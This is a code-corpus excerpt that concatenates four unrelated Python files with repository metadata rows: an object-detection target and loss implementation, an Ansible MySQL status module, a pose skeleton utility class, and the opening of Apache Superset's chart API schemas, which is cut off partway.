        if min(masked_gaussian.shape) > 0 and min(masked_heatmap.shape) > 0:
            # Element-wise max keeps the strongest response where objects overlap.
            torch.max(masked_heatmap, masked_gaussian * k, out=masked_heatmap)
        return heatmap

    def bbox_areas(self, bboxes, keep_axis=False):
        """Areas of (x1, y1, x2, y2) boxes, inclusive of the border pixel."""
        x_min, y_min, x_max, y_max = bboxes[:, 0], bboxes[:, 1], bboxes[:, 2], bboxes[:, 3]
        areas = (y_max - y_min + 1) * (x_max - x_min + 1)
        if keep_axis:
            return areas[:, None]
        return areas

    def target_single_image(self, gt_boxes, gt_labels, feat_shape):
        """
        Args:
            gt_boxes: tensor, tensor <=> img, (num_gt, 4).
            gt_labels: tensor, tensor <=> img, (num_gt,).
            feat_shape: tuple.

        Returns:
            heatmap: tensor, tensor <=> img, (80, h, w).
            box_target: tensor, tensor <=> img, (4, h, w) or (80 * 4, h, w).
            reg_weight: tensor, same as box_target
        """
        output_h, output_w = feat_shape
        heatmap_channel = self.num_fg
        heatmap = gt_boxes.new_zeros((heatmap_channel, output_h, output_w))
        fake_heatmap = gt_boxes.new_zeros((output_h, output_w))
        # -1 marks locations with no regression target.
        box_target = gt_boxes.new_ones((self.wh_planes, output_h, output_w)) * -1
        reg_weight = gt_boxes.new_zeros((self.wh_planes // 4, output_h, output_w))
        if self.wh_area_process == 'log':
            boxes_areas_log = self.bbox_areas(gt_boxes).log()
        elif self.wh_area_process == 'sqrt':
            boxes_areas_log = self.bbox_areas(gt_boxes).sqrt()
        else:
            boxes_areas_log = self.bbox_areas(gt_boxes)
        # Sort boxes by (processed) area, descending.
        boxes_area_topk_log, boxes_ind = torch.topk(boxes_areas_log, boxes_areas_log.size(0))
        if self.wh_area_process == 'norm':
            boxes_area_topk_log[:] = 1.
        gt_boxes = gt_boxes[boxes_ind]
        gt_labels = gt_labels[boxes_ind]
        feat_gt_boxes = gt_boxes / self.down_ratio
        feat_gt_boxes[:, [0, 2]] = torch.clamp(feat_gt_boxes[:, [0, 2]], min=0,
                                               max=output_w - 1)
        feat_gt_boxes[:, [1, 3]] = torch.clamp(feat_gt_boxes[:, [1, 3]], min=0,
                                               max=output_h - 1)
        feat_hs, feat_ws = (feat_gt_boxes[:, 3] - feat_gt_boxes[:, 1],
                            feat_gt_boxes[:, 2] - feat_gt_boxes[:, 0])
        # we calc the center and ignore area based on the gt-boxes of the origin scale
        # no peak will fall between pixels
        ct_ints = (torch.stack([(gt_boxes[:, 0] + gt_boxes[:, 2]) / 2,
                                (gt_boxes[:, 1] + gt_boxes[:, 3]) / 2],
                               dim=1) / self.down_ratio).to(torch.int)
        h_radiuses_alpha = (feat_hs / 2. * self.alpha).int()
        w_radiuses_alpha = (feat_ws / 2. * self.alpha).int()
        if self.wh_gaussian and self.alpha != self.beta:
            h_radiuses_beta = (feat_hs / 2. * self.beta).int()
            w_radiuses_beta = (feat_ws / 2. * self.beta).int()
        if not self.wh_gaussian:
            # calculate positive (center) regions
            r1 = (1 - self.beta) / 2
            ctr_x1s, ctr_y1s, ctr_x2s, ctr_y2s = calc_region(gt_boxes.transpose(0, 1), r1)
            ctr_x1s, ctr_y1s, ctr_x2s, ctr_y2s = [torch.round(x.float() / self.down_ratio).int()
                                                  for x in [ctr_x1s, ctr_y1s, ctr_x2s, ctr_y2s]]
            ctr_x1s, ctr_x2s = [torch.clamp(x, max=output_w - 1) for x in [ctr_x1s, ctr_x2s]]
            ctr_y1s, ctr_y2s = [torch.clamp(y, max=output_h - 1) for y in [ctr_y1s, ctr_y2s]]
        # larger boxes have lower priority than small boxes.
        for k in range(boxes_ind.shape[0]):
            cls_id = gt_labels[k] - 1
            fake_heatmap = fake_heatmap.zero_()
            self.draw_truncate_gaussian(fake_heatmap, ct_ints[k],
                                        h_radiuses_alpha[k].item(), w_radiuses_alpha[k].item())
            heatmap[cls_id] = torch.max(heatmap[cls_id], fake_heatmap)
            if self.wh_gaussian:
                if self.alpha != self.beta:
                    fake_heatmap = fake_heatmap.zero_()
                    self.draw_truncate_gaussian(fake_heatmap, ct_ints[k],
                                                h_radiuses_beta[k].item(),
                                                w_radiuses_beta[k].item())
                box_target_inds = fake_heatmap > 0
            else:
                ctr_x1, ctr_y1, ctr_x2, ctr_y2 = ctr_x1s[k], ctr_y1s[k], ctr_x2s[k], ctr_y2s[k]
                box_target_inds = torch.zeros_like(fake_heatmap, dtype=torch.uint8)
                box_target_inds[ctr_y1:ctr_y2 + 1, ctr_x1:ctr_x2 + 1] = 1
            if self.wh_agnostic:
                box_target[:, box_target_inds] = gt_boxes[k][:, None]
                cls_id = 0
            else:
                box_target[(cls_id * 4):((cls_id + 1) * 4), box_target_inds] = gt_boxes[k][:, None]
            if self.wh_gaussian:
                # Weight each positive location by its (normalized) Gaussian
                # response, scaled by the processed box area.
                local_heatmap = fake_heatmap[box_target_inds]
                ct_div = local_heatmap.sum()
                local_heatmap *= boxes_area_topk_log[k]
                reg_weight[cls_id, box_target_inds] = local_heatmap / ct_div
            else:
                reg_weight[cls_id, box_target_inds] = \
                    boxes_area_topk_log[k] / box_target_inds.sum().float()
        return heatmap, box_target, reg_weight

    def simple_nms(self, heat, kernel=3, out_heat=None):
        """Max-pool NMS: keep only local maxima of the heatmap."""
        pad = (kernel - 1) // 2
        hmax = nn.functional.max_pool2d(heat, (kernel, kernel), stride=1, padding=pad)
        keep = (hmax == heat).float()
        out_heat = heat if out_heat is None else out_heat
        return out_heat * keep

    def target_generator(self, gt_boxes, gt_labels, img_metas):
        """
        Args:
            gt_boxes: list(tensor). tensor <=> image, (gt_num, 4).
            gt_labels: list(tensor). tensor <=> image, (gt_num,).
            img_metas: list(dict).

        Returns:
            heatmap: tensor, (batch, 80, h, w).
            box_target: tensor, (batch, 4, h, w) or (batch, 80 * 4, h, w).
            reg_weight: tensor, same as box_target.
        """
        with torch.no_grad():
            feat_shape = (img_metas[0]['pad_shape'][0] // self.down_ratio,
                          img_metas[0]['pad_shape'][1] // self.down_ratio)
            heatmap, box_target, reg_weight = multi_apply(
                self.target_single_image,
                gt_boxes,
                gt_labels,
                feat_shape=feat_shape
            )
            heatmap, box_target = [torch.stack(t, dim=0).detach() for t in [heatmap, box_target]]
            reg_weight = torch.stack(reg_weight, dim=0).detach()
            return heatmap, box_target, reg_weight

    def loss_calc(self,
                  pred_hm,
                  pred_wh,
                  heatmap,
                  box_target,
                  wh_weight):
        """
        Args:
            pred_hm: tensor, (batch, 80, h, w).
            pred_wh: tensor, (batch, 4, h, w) or (batch, 80 * 4, h, w).
            heatmap: tensor, same as pred_hm.
            box_target: tensor, same as pred_wh.
            wh_weight: tensor, same as pred_wh.

        Returns:
            hm_loss
            wh_loss
        """
        H, W = pred_hm.shape[2:]
        # NOTE: in-place sigmoid modifies the caller's tensor; clamp keeps
        # the focal loss numerically stable.
        pred_hm = torch.clamp(pred_hm.sigmoid_(), min=1e-4, max=1 - 1e-4)
        hm_loss = ct_focal_loss(pred_hm, heatmap) * self.hm_weight
        mask = wh_weight.view(-1, H, W)
        avg_factor = mask.sum() + 1e-4
        # Build (and cache) the pixel-coordinate grid for decoding boxes.
        if self.base_loc is None or H != self.base_loc.shape[1] or W != self.base_loc.shape[2]:
            base_step = self.down_ratio
            shifts_x = torch.arange(0, (W - 1) * base_step + 1, base_step,
                                    dtype=torch.float32, device=heatmap.device)
            shifts_y = torch.arange(0, (H - 1) * base_step + 1, base_step,
                                    dtype=torch.float32, device=heatmap.device)
            shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)
            self.base_loc = torch.stack((shift_x, shift_y), dim=0)  # (2, h, w)
        # (batch, h, w, 4)
        pred_boxes = torch.cat((self.base_loc - pred_wh[:, [0, 1]],
                                self.base_loc + pred_wh[:, [2, 3]]), dim=1).permute(0, 2, 3, 1)
        # (batch, h, w, 4)
        boxes = box_target.permute(0, 2, 3, 1)
        wh_loss = self.regloss(pred_boxes, boxes, mask, avg_factor=avg_factor) * self.wh_weight
        return hm_loss, wh_loss
class ShortcutConv2d(nn.Module):
    """Lateral shortcut branch: a chain of convolutions with ReLU between
    them (and optionally after the last one when ``activation_last``).
    """

    def __init__(self,
                 in_channels,
                 out_channels,
                 kernel_sizes,
                 paddings,
                 activation_last=False):
        super(ShortcutConv2d, self).__init__()
        assert len(kernel_sizes) == len(paddings)
        num_convs = len(kernel_sizes)
        modules = []
        for idx, (ksize, pad) in enumerate(zip(kernel_sizes, paddings)):
            # First conv maps in_channels -> out_channels; the rest stay at
            # out_channels.
            src_channels = out_channels if idx else in_channels
            modules.append(nn.Conv2d(src_channels, out_channels, ksize, padding=pad))
            is_last = idx == num_convs - 1
            if activation_last or not is_last:
                modules.append(nn.ReLU(inplace=True))
        self.layers = nn.Sequential(*modules)

    def forward(self, x):
        return self.layers(x)
| 40.168582 | 118 | 0.557135 |
795bb4eb9500b54661e8c101d43230713a7565c9 | 4,498 | py | Python | ansible/galera-operator/ansible/library/mysql_status.py | canghai908/operator-sdk-samples | ddcf4086d52f2bcbc79d6269eb9fb0ee795494d3 | [
"Apache-2.0"
] | null | null | null | ansible/galera-operator/ansible/library/mysql_status.py | canghai908/operator-sdk-samples | ddcf4086d52f2bcbc79d6269eb9fb0ee795494d3 | [
"Apache-2.0"
] | null | null | null | ansible/galera-operator/ansible/library/mysql_status.py | canghai908/operator-sdk-samples | ddcf4086d52f2bcbc79d6269eb9fb0ee795494d3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2018, James Cammarata <jimi@sngx.net>
# Copied and modified mainly from the mysql_variables.py module.
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: mysql_status
short_description: Get MySQL status variables.
description:
- Query MySQL status variables
version_added: 2.8
author: "James Cammarata"
options:
status:
description:
- Variable name to operate
required: True
extends_documentation_fragment: mysql
'''
EXAMPLES = '''
# Get Galera cluster size
- mysql_status:
status: wsrep_cluster_size
# Get all wsrep status variables
- mysql_status:
status: "%wsrep%"
'''
import json
import os
import warnings
from re import match
# Probe for the MySQLdb driver; record availability instead of failing at
# import time so main() can report a clean Ansible error.
# NOTE(review): `mysqldb_found` is re-imported below from
# ansible.module_utils.mysql, which shadows this value — confirm which one
# is authoritative.
try:
    import MySQLdb
except ImportError:
    mysqldb_found = False
else:
    mysqldb_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.database import SQLParseError, mysql_quote_identifier
from ansible.module_utils.mysql import mysql_connect, mysqldb_found
from ansible.module_utils._text import to_native
def typedvalue(value):
    """
    Convert value to number whenever possible, return same value
    otherwise.

    >>> typedvalue('3')
    3
    >>> typedvalue('3.0')
    3.0
    >>> typedvalue('foobar')
    'foobar'
    """
    # Try the narrowest numeric type first; fall through on parse failure.
    for cast in (int, float):
        try:
            return cast(value)
        except ValueError:
            pass
    return value
def getstatus(cursor, status_name):
    """Run ``SHOW STATUS LIKE`` for *status_name* and return the raw rows.

    The name may contain SQL ``%`` wildcards; it is passed as a bound
    parameter, so no manual escaping is needed.  Database errors propagate
    to the caller (same effective behavior as before — the previous
    ``if 1: #try:`` debugging scaffold and dead commented-out exception
    handler have been removed).

    :param cursor: an open DB-API cursor.
    :param status_name: status variable name or LIKE pattern.
    :return: list of ``(name, value)`` tuples as returned by the server.
    """
    cursor.execute("SHOW STATUS LIKE %s", (status_name,))
    return cursor.fetchall()
def main():
    """Ansible module entry point: connect to MySQL and collect the
    requested status variables into the module result."""
    module = AnsibleModule(
        argument_spec=dict(
            status=dict(default=None, type='list', required=True),
            login_user=dict(default=None),
            login_password=dict(default=None, no_log=True),
            login_host=dict(default="localhost"),
            login_port=dict(default=3306, type='int'),
            login_unix_socket=dict(default=None),
            ssl_cert=dict(default=None),
            ssl_key=dict(default=None),
            ssl_ca=dict(default=None),
            connect_timeout=dict(default=30, type='int'),
            config_file=dict(default="~/.my.cnf", type="path")
        )
    )
    user = module.params["login_user"]
    password = module.params["login_password"]
    ssl_cert = module.params["ssl_cert"]
    ssl_key = module.params["ssl_key"]
    ssl_ca = module.params["ssl_ca"]
    connect_timeout = module.params['connect_timeout']
    config_file = module.params['config_file']
    db = 'mysql'  # NOTE(review): assigned but never used — confirm intent.
    mysqlstatus = module.params["status"]
    if not mysqldb_found:
        module.fail_json(msg="The MySQL-python module is required.")
    else:
        # Promote MySQL warnings to errors so they surface as failures.
        warnings.filterwarnings('error', category=MySQLdb.Warning)
    try:
        cursor = mysql_connect(
            module,
            user,
            password,
            config_file,
            ssl_cert,
            ssl_key,
            ssl_ca,
            connect_timeout=connect_timeout,
        )
    except Exception as e:
        if os.path.exists(config_file):
            module.fail_json(msg="unable to connect to database, check login_user and login_password are correct or %s has the credentials. "
                                 "Exception message: %s" % (config_file, to_native(e)))
        else:
            module.fail_json(msg="unable to find %s. Exception message: %s" % (config_file, to_native(e)))
    statuses = {}
    for status in mysqlstatus:
        # Only alphanumerics, underscore and the LIKE wildcard are accepted.
        if match('^[0-9a-z_\%]+$', status) is None:
            module.fail_json(msg="invalid status name \"%s\"" % status)
        mysqlstatus_res = getstatus(cursor, status)
        if mysqlstatus_res is None:
            statuses[status] = None
        else:
            # Lower-case names and coerce numeric-looking values.
            mysqlstatus_res = [(x[0].lower(), typedvalue(x[1])) for x in mysqlstatus_res]
            for res in mysqlstatus_res:
                statuses[res[0]] = res[1]
    module.exit_json(msg="Status found", status=statuses, changed=False)
if __name__ == '__main__':
main()
| 27.426829 | 141 | 0.631836 |
795bb62763fc4e6a8ab30085777d3b8c1105b88c | 2,555 | py | Python | GASTNet-pipeline/common/skeleton.py | farhan3a/3D-HumanPoseEstimation | 906b972749371c8fb16cb851e9a069df1cf76053 | [
"CC0-1.0"
] | 235 | 2020-07-14T10:41:18.000Z | 2022-03-28T13:15:28.000Z | GASTNet-pipeline/common/skeleton.py | farhan3a/3D-HumanPoseEstimation | 906b972749371c8fb16cb851e9a069df1cf76053 | [
"CC0-1.0"
] | 58 | 2020-07-14T23:39:55.000Z | 2022-03-24T12:48:13.000Z | GASTNet-pipeline/common/skeleton.py | farhan3a/3D-HumanPoseEstimation | 906b972749371c8fb16cb851e9a069df1cf76053 | [
"CC0-1.0"
] | 52 | 2020-07-23T05:59:42.000Z | 2022-03-14T07:13:26.000Z | import numpy as np
class Skeleton:
    """Kinematic tree of a pose skeleton.

    ``parents[i]`` is the parent joint index of joint ``i`` (-1 for the
    root).  ``joints_left`` / ``joints_right`` list the indices of the
    left- and right-side joints (used e.g. for flip augmentation).
    """

    def __init__(self, parents, joints_left, joints_right):
        assert len(joints_left) == len(joints_right)
        self._parents = parents
        self._joints_left = joints_left
        self._joints_right = joints_right
        # Bug fix: compute children/has_children metadata right away.
        # Previously it was only computed inside remove_joints(), so
        # has_children()/children() raised AttributeError until that
        # method had been called at least once.
        self._compute_metadata()

    def num_joints(self):
        """Number of joints in the skeleton."""
        return len(self._parents)

    def parents(self):
        """Parent index per joint (-1 for the root)."""
        return self._parents

    def has_children(self):
        """Boolean array: True where the joint has at least one child."""
        return self._has_children

    def children(self):
        """List of child-index lists, one per joint."""
        return self._children

    def remove_joints(self, joints_to_remove):
        """
        Remove the joints specified in 'joints_to_remove'.

        Re-parents descendants of removed joints to their nearest kept
        ancestor and compacts all indices.  Returns the list of original
        indices that were kept.
        """
        valid_joints = []
        for joint in range(len(self._parents)):
            if joint not in joints_to_remove:
                valid_joints.append(joint)
        # Walk each joint's parent chain up past any removed joints.
        for i in range(len(self._parents)):
            while self._parents[i] in joints_to_remove:
                self._parents[i] = self._parents[self._parents[i]]
        # index_offsets[j] = how many removed joints precede (or equal) j,
        # i.e. how much index j shifts down after compaction.
        index_offsets = np.zeros(len(self._parents), dtype=int)
        new_parents = []
        for i, parent in enumerate(self._parents):
            if i not in joints_to_remove:
                new_parents.append(parent - index_offsets[parent])
            else:
                index_offsets[i:] += 1
        self._parents = np.array(new_parents)
        if self._joints_left is not None:
            new_joints_left = []
            for joint in self._joints_left:
                if joint in valid_joints:
                    new_joints_left.append(joint - index_offsets[joint])
            self._joints_left = new_joints_left
        if self._joints_right is not None:
            new_joints_right = []
            for joint in self._joints_right:
                if joint in valid_joints:
                    new_joints_right.append(joint - index_offsets[joint])
            self._joints_right = new_joints_right
        self._compute_metadata()
        return valid_joints

    def joints_left(self):
        """Indices of left-side joints."""
        return self._joints_left

    def joints_right(self):
        """Indices of right-side joints."""
        return self._joints_right

    def _compute_metadata(self):
        """Derive per-joint children lists and has-children flags."""
        self._has_children = np.zeros(len(self._parents)).astype(bool)
        for i, parent in enumerate(self._parents):
            if parent != -1:
                self._has_children[parent] = True
        # One (initially empty) child list per joint.  (Previously written
        # as `for parents in enumerate(self._parents)`, which worked but
        # obscured the intent.)
        self._children = [[] for _ in range(len(self._parents))]
        for i, parent in enumerate(self._parents):
            if parent != -1:
                self._children[parent].append(i)
795bb63fe330e50d1e2d4a5685a42511e5e37cca | 43,418 | py | Python | superset/charts/schemas.py | jinnig/superset | c2e429039234cd74ce80e931a6df8400558fd4be | [
"Apache-2.0"
] | 1 | 2021-04-12T15:40:41.000Z | 2021-04-12T15:40:41.000Z | superset/charts/schemas.py | skhortiuk/superset | ac9c1372b42d8b64cf204faa88fe37a37bf0b06b | [
"Apache-2.0"
] | null | null | null | superset/charts/schemas.py | skhortiuk/superset | ac9c1372b42d8b64cf204faa88fe37a37bf0b06b | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Any, Dict
from flask_babel import gettext as _
from marshmallow import EXCLUDE, fields, post_load, Schema, validate
from marshmallow.validate import Length, Range
from marshmallow_enum import EnumField
from superset import app
from superset.common.query_context import QueryContext
from superset.db_engine_specs.base import builtin_time_grains
from superset.utils import schema as utils
from superset.utils.core import (
AnnotationType,
ChartDataResultFormat,
ChartDataResultType,
FilterOperator,
PostProcessingBoxplotWhiskerType,
PostProcessingContributionOrientation,
TimeRangeEndpoint,
)
config = app.config

#
# RISON/JSON schemas for query parameters
#
get_delete_ids_schema = {"type": "array", "items": {"type": "integer"}}
width_height_schema = {
    "type": "array",
    "items": {"type": "integer"},
}
thumbnail_query_schema = {
    "type": "object",
    "properties": {"force": {"type": "boolean"}},
}
screenshot_query_schema = {
    "type": "object",
    "properties": {
        "force": {"type": "boolean"},
        "window_size": width_height_schema,
        "thumb_size": width_height_schema,
    },
}
get_export_ids_schema = {"type": "array", "items": {"type": "integer"}}
get_fav_star_ids_schema = {"type": "array", "items": {"type": "integer"}}

#
# Column schema descriptions (reused across the schema classes below).
# NOTE(review): several strings contain typos ("propose", "datasouce_id",
# "Owner are users ids") — left untouched here since they are user-visible
# API documentation strings; fix in a dedicated change.
#
slice_name_description = "The name of the chart."
description_description = "A description of the chart propose."
viz_type_description = "The type of chart visualization used."
owners_description = (
    "Owner are users ids allowed to delete or change this chart. "
    "If left empty you will be one of the owners of the chart."
)
params_description = (
    "Parameters are generated dynamically when clicking the save "
    "or overwrite button in the explore view. "
    "This JSON object for power users who may want to alter specific parameters."
)
query_context_description = (
    "The query context represents the queries that need to run "
    "in order to generate the data the visualization, and in what "
    "format the data should be returned."
)
cache_timeout_description = (
    "Duration (in seconds) of the caching timeout "
    "for this chart. Note this defaults to the datasource/table"
    " timeout if undefined."
)
datasource_id_description = (
    "The id of the dataset/datasource this new chart will use. "
    "A complete datasource identification needs `datasouce_id` "
    "and `datasource_type`."
)
datasource_uid_description = (
    "The uid of the dataset/datasource this new chart will use. "
    "A complete datasource identification needs `datasouce_uid` "
)
datasource_type_description = (
    "The type of dataset/datasource identified on `datasource_id`."
)
datasource_name_description = "The datasource name."
dashboards_description = "A list of dashboards to include this new chart to."
changed_on_description = "The ISO date that the chart was last changed."
slice_url_description = "The URL of the chart."
form_data_description = (
    "Form data from the Explore controls used to form the chart's data query."
)
description_markeddown_description = "Sanitized HTML version of the chart description."
owners_name_description = "Name of an owner of the chart."

#
# OpenAPI method specification overrides
#
openapi_spec_methods_override = {
    "get": {"get": {"description": "Get a chart detail information."}},
    "get_list": {
        "get": {
            "description": "Get a list of charts, use Rison or JSON query "
            "parameters for filtering, sorting, pagination and "
            " for selecting specific columns and metadata.",
        }
    },
    "info": {
        "get": {
            "description": "Several metadata information about chart API endpoints.",
        }
    },
    "related": {
        "get": {
            "description": "Get a list of all possible owners for a chart. "
            "Use `owners` has the `column_name` parameter"
        }
    },
}
class ChartEntityResponseSchema(Schema):
    """
    Schema for a chart object
    """

    slice_id = fields.Integer()
    slice_name = fields.String(description=slice_name_description)
    cache_timeout = fields.Integer(description=cache_timeout_description)
    changed_on = fields.String(description=changed_on_description)
    modified = fields.String()
    datasource = fields.String(description=datasource_name_description)
    description = fields.String(description=description_description)
    description_markeddown = fields.String(
        description=description_markeddown_description
    )
    form_data = fields.Dict(description=form_data_description)
    slice_url = fields.String(description=slice_url_description)
class ChartPostSchema(Schema):
    """
    Schema to add a new chart.
    """

    slice_name = fields.String(
        description=slice_name_description, required=True, validate=Length(1, 250)
    )
    description = fields.String(description=description_description, allow_none=True)
    viz_type = fields.String(
        description=viz_type_description,
        validate=Length(0, 250),
        example=["bar", "line_multi", "area", "table"],
    )
    owners = fields.List(fields.Integer(description=owners_description))
    # params/query_context are stored as JSON-encoded strings.
    params = fields.String(
        description=params_description, allow_none=True, validate=utils.validate_json
    )
    query_context = fields.String(
        description=query_context_description,
        allow_none=True,
        validate=utils.validate_json,
    )
    cache_timeout = fields.Integer(
        description=cache_timeout_description, allow_none=True
    )
    # Both id and type are required to fully identify the datasource.
    datasource_id = fields.Integer(description=datasource_id_description, required=True)
    datasource_type = fields.String(
        description=datasource_type_description,
        validate=validate.OneOf(choices=("druid", "table", "view")),
        required=True,
    )
    datasource_name = fields.String(
        description=datasource_name_description, allow_none=True
    )
    dashboards = fields.List(fields.Integer(description=dashboards_description))
class ChartPutSchema(Schema):
    """
    Schema to update or patch a chart
    """

    # All fields optional: a PUT/PATCH may update any subset.
    slice_name = fields.String(
        description=slice_name_description, allow_none=True, validate=Length(0, 250)
    )
    description = fields.String(description=description_description, allow_none=True)
    viz_type = fields.String(
        description=viz_type_description,
        allow_none=True,
        validate=Length(0, 250),
        example=["bar", "line_multi", "area", "table"],
    )
    owners = fields.List(fields.Integer(description=owners_description))
    # Unlike ChartPostSchema, params/query_context are not JSON-validated here.
    params = fields.String(description=params_description, allow_none=True)
    query_context = fields.String(
        description=query_context_description, allow_none=True
    )
    cache_timeout = fields.Integer(
        description=cache_timeout_description, allow_none=True
    )
    datasource_id = fields.Integer(
        description=datasource_id_description, allow_none=True
    )
    datasource_type = fields.String(
        description=datasource_type_description,
        validate=validate.OneOf(choices=("druid", "table", "view")),
        allow_none=True,
    )
    dashboards = fields.List(fields.Integer(description=dashboards_description))
class ChartGetDatasourceObjectDataResponseSchema(Schema):
    """Identification payload for a chart's datasource."""

    datasource_id = fields.Integer(description="The datasource identifier")
    # NOTE(review): the type is modeled as Integer here — confirm it should
    # not be a String like elsewhere in this module.
    datasource_type = fields.Integer(description="The datasource type")
class ChartGetDatasourceObjectResponseSchema(Schema):
label = fields.String(description="The name of the datasource")
value = fields.Nested(ChartGetDatasourceObjectDataResponseSchema)
class ChartGetDatasourceResponseSchema(Schema):
count = fields.Integer(description="The total number of datasources")
result = fields.Nested(ChartGetDatasourceObjectResponseSchema)
class ChartCacheScreenshotResponseSchema(Schema):
cache_key = fields.String(description="The cache key")
chart_url = fields.String(description="The url to render the chart")
image_url = fields.String(description="The url to fetch the screenshot")
class ChartDataColumnSchema(Schema):
column_name = fields.String(
description="The name of the target column", example="mycol",
)
type = fields.String(description="Type of target column", example="BIGINT")
class ChartDataAdhocMetricSchema(Schema):
"""
Ad-hoc metrics are used to define metrics outside the datasource.
"""
expressionType = fields.String(
description="Simple or SQL metric",
required=True,
validate=validate.OneOf(choices=("SIMPLE", "SQL")),
example="SQL",
)
aggregate = fields.String(
description="Aggregation operator. Only required for simple expression types.",
validate=validate.OneOf(
choices=("AVG", "COUNT", "COUNT_DISTINCT", "MAX", "MIN", "SUM")
),
)
column = fields.Nested(ChartDataColumnSchema)
sqlExpression = fields.String(
description="The metric as defined by a SQL aggregate expression. "
"Only required for SQL expression type.",
example="SUM(weight * observations) / SUM(weight)",
)
label = fields.String(
description="Label for the metric. Is automatically generated unless "
"hasCustomLabel is true, in which case label must be defined.",
example="Weighted observations",
)
hasCustomLabel = fields.Boolean(
description="When false, the label will be automatically generated based on "
"the aggregate expression. When true, a custom label has to be "
"specified.",
example=True,
)
optionName = fields.String(
description="Unique identifier. Can be any string value, as long as all "
"metrics have a unique identifier. If undefined, a random name "
"will be generated.",
example="metric_aec60732-fac0-4b17-b736-93f1a5c93e30",
)
class ChartDataAggregateConfigField(fields.Dict):
def __init__(self) -> None:
super().__init__(
description="The keys are the name of the aggregate column to be created, "
"and the values specify the details of how to apply the "
"aggregation. If an operator requires additional options, "
"these can be passed here to be unpacked in the operator call. The "
"following numpy operators are supported: average, argmin, argmax, cumsum, "
"cumprod, max, mean, median, nansum, nanmin, nanmax, nanmean, nanmedian, "
"min, percentile, prod, product, std, sum, var. Any options required by "
"the operator can be passed to the `options` object.\n"
"\n"
"In the example, a new column `first_quantile` is created based on values "
"in the column `my_col` using the `percentile` operator with "
"the `q=0.25` parameter.",
example={
"first_quantile": {
"operator": "percentile",
"column": "my_col",
"options": {"q": 0.25},
}
},
)
class ChartDataPostProcessingOperationOptionsSchema(Schema):
pass
class ChartDataAggregateOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Aggregate operation config.
"""
groupby = (
fields.List(
fields.String(
allow_none=False, description="Columns by which to group by",
),
minLength=1,
required=True,
),
)
aggregates = ChartDataAggregateConfigField()
class ChartDataRollingOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Rolling operation config.
"""
columns = (
fields.Dict(
description="columns on which to perform rolling, mapping source column to "
"target column. For instance, `{'y': 'y'}` will replace the "
"column `y` with the rolling value in `y`, while `{'y': 'y2'}` "
"will add a column `y2` based on rolling values calculated "
"from `y`, leaving the original column `y` unchanged.",
example={"weekly_rolling_sales": "sales"},
),
)
rolling_type = fields.String(
description="Type of rolling window. Any numpy function will work.",
validate=validate.OneOf(
choices=(
"average",
"argmin",
"argmax",
"cumsum",
"cumprod",
"max",
"mean",
"median",
"nansum",
"nanmin",
"nanmax",
"nanmean",
"nanmedian",
"nanpercentile",
"min",
"percentile",
"prod",
"product",
"std",
"sum",
"var",
)
),
required=True,
example="percentile",
)
window = fields.Integer(
description="Size of the rolling window in days.", required=True, example=7,
)
rolling_type_options = fields.Dict(
desctiption="Optional options to pass to rolling method. Needed for "
"e.g. quantile operation.",
example={},
)
center = fields.Boolean(
description="Should the label be at the center of the window. Default: `false`",
example=False,
)
win_type = fields.String(
description="Type of window function. See "
"[SciPy window functions](https://docs.scipy.org/doc/scipy/reference"
"/signal.windows.html#module-scipy.signal.windows) "
"for more details. Some window functions require passing "
"additional parameters to `rolling_type_options`. For instance, "
"to use `gaussian`, the parameter `std` needs to be provided.",
validate=validate.OneOf(
choices=(
"boxcar",
"triang",
"blackman",
"hamming",
"bartlett",
"parzen",
"bohman",
"blackmanharris",
"nuttall",
"barthann",
"kaiser",
"gaussian",
"general_gaussian",
"slepian",
"exponential",
)
),
)
min_periods = fields.Integer(
description="The minimum amount of periods required for a row to be included "
"in the result set.",
example=7,
)
class ChartDataSelectOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Sort operation config.
"""
columns = fields.List(
fields.String(),
description="Columns which to select from the input data, in the desired "
"order. If columns are renamed, the original column name should be "
"referenced here.",
example=["country", "gender", "age"],
)
exclude = fields.List(
fields.String(),
description="Columns to exclude from selection.",
example=["my_temp_column"],
)
rename = fields.List(
fields.Dict(),
description="columns which to rename, mapping source column to target column. "
"For instance, `{'y': 'y2'}` will rename the column `y` to `y2`.",
example=[{"age": "average_age"}],
)
class ChartDataSortOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Sort operation config.
"""
columns = fields.Dict(
description="columns by by which to sort. The key specifies the column name, "
"value specifies if sorting in ascending order.",
example={"country": True, "gender": False},
required=True,
)
aggregates = ChartDataAggregateConfigField()
class ChartDataContributionOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Contribution operation config.
"""
orientation = fields.String(
description="Should cell values be calculated across the row or column.",
required=True,
validate=validate.OneOf(
choices=[val.value for val in PostProcessingContributionOrientation]
),
example="row",
)
class ChartDataProphetOptionsSchema(ChartDataPostProcessingOperationOptionsSchema):
"""
Prophet operation config.
"""
time_grain = fields.String(
description="Time grain used to specify time period increments in prediction. "
"Supports [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601#Durations) "
"durations.",
validate=validate.OneOf(
choices=[
i
for i in {**builtin_time_grains, **config["TIME_GRAIN_ADDONS"]}.keys()
if i
]
),
example="P1D",
required=True,
)
periods = fields.Integer(
descrption="Time periods (in units of `time_grain`) to predict into the future",
min=1,
example=7,
required=True,
)
confidence_interval = fields.Float(
description="Width of predicted confidence interval",
validate=[
Range(
